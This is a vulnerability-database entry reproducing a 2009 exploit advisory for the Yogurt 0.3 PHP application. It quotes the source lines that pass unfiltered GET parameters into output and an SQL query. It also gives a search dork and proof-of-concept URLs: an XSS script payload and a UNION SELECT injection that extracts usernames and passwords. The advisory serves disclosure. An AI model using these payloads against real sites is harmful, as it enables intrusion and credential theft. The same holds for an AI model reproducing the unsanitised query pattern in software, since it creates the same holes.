Yogurt 0.3 (XSS/SQL Injection) Multiple Remote Vulnerabilities

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1051868 漏洞类型
发布时间 2009-06-15 更新时间 2009-06-15
CVE编号 CVE-2009-2033
CVE-2009-2034
CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2009060138
|漏洞详情
漏洞细节尚未披露
|漏洞EXP

  Name : Yogurt
  Site    : http://sourceforge.net/projects/yogurt/
  Down : http://sourceforge.net/project/showfiles.php?group_id=112452&package_id=141123&release_id=297459
  Dork  : "Yogurt build"
 
 
  Found By : br0ly
  Made in  : Brasil
  Contact  : br0ly[dot]Code[at]gmail[dot]com

  Description:

  Bug : XSS
 
  In index.php:

  index.php:45:    if(isset($_GET['msg']))
  index.php:48:        print("<center>". $_GET['msg'] . "</center>"); <-- XSS VUL

  BUG : SQL INJECTION

  system/writemessage.php:81: $rs = mysql_query("SELECT * FROM messages WHERE id=" . $_GET['original'], $db) <-- SQLi Vul
  system/writemessage.php:82:                or bug("Database error, please try again");
  system/writemessage.php:83:            $row = mysql_fetch_array($rs);

 
     
  In neither case was the method _GET filtered properly.
  Others .phps also contains the failures I'm posting the first one I found .. ^^


  P0c:
 
    XSS  :  http://localhost/xscripts/yogurt/index.php?msg=<script>alert('br0ly')</script>
   
    First: Go to: http://localhost/yogurt/newuser.php, after register, just login and you can explore the sqli.
   
    SQLi :
    http://localhost/yogurt/system/writemessage.php?original=-1+union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8+from+users--



  OBS: need register_globals=on;